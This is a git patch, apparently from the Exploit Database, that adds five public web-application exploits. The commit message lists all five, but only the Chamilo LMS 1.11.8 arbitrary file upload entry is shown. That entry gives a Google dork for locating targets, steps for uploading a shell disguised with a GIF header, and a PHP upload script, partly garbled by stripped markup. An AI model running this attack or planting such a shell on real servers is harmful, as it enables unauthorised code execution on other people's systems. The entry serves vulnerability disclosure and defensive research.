From dc44a5e5a693b4e320c0aeb9d3fb03a600c0b284 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 27 Sep 2019 05:01:48 +0000
Subject: [PATCH] DB: 2019-09-27
5 changes to exploits/shellcodes
Chamillo LMS 1.11.8 - Arbitrary File Upload
Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
inoERP 4.15 - 'download' SQL Injection
citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
---
exploits/php/webapps/47423.txt | 55 +++++++++++++++++++++++++++++++++
exploits/php/webapps/47424.txt | 48 +++++++++++++++++++++++++++++
exploits/php/webapps/47425.txt | 56 ++++++++++++++++++++++++++++++++++
exploits/php/webapps/47426.txt | 48 +++++++++++++++++++++++++++++
exploits/php/webapps/47427.txt | 34 +++++++++++++++++++++
files_exploits.csv | 5 +++
6 files changed, 246 insertions(+)
create mode 100644 exploits/php/webapps/47423.txt
create mode 100644 exploits/php/webapps/47424.txt
create mode 100644 exploits/php/webapps/47425.txt
create mode 100644 exploits/php/webapps/47426.txt
create mode 100644 exploits/php/webapps/47427.txt
diff --git a/exploits/php/webapps/47423.txt b/exploits/php/webapps/47423.txt
new file mode 100644
index 000000000..715362da9
--- /dev/null
+++ b/exploits/php/webapps/47423.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Chamillo LMS 1.11.8 - Arbitrary File Upload
+# Google Dork: "powered by chamilo"
+# Date: 2018-10-05
+# Exploit Author: Sohel Yousef jellyfish security team
+# Software Link: https://chamilo.org/en/download/
+# Version: Chamilo 1.11.8 or lower to 1.8
+# Category: webapps
+
+# 1. Description
+# Any registered user can upload files and rename and change the file type to
+# php5 or php7 by ckeditor module in my files section
+
+# register here :
+# http://localhost/chamilo//main/auth/inscription.php
+# after registration you can view this sections
+# http://localhost/chamilo/main/social/myfiles.php
+# http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0
+# upload your shell in gif format and then rename the format
+# if the rename function was desabled and add this GIF89;aGIF89;aGIF89;a before
+
+ PHP Test
+
+
+
+ FILE UPLOAD
';
+ $tgt_dir = "uploads/";
+ $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
+ echo "
TARGET FILE= ".$tgt_file;
+ //$filename = $_FILES['fileToUpload']['name'];
+ echo "
FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
+ if(isset($_POST['submit']))
+ {
+ if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
+ { echo "
file exists, try with another name"; }
+ else {
+ echo "
STARTING UPLOAD PROCESS
";
+ if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
+$tgt_file))
+ { echo "
File UPLOADED:- ".$tgt_file; }
+
+ else { echo "
ERROR WHILE UPLOADING FILE
"; }
+ }
+ }
+?>
+
+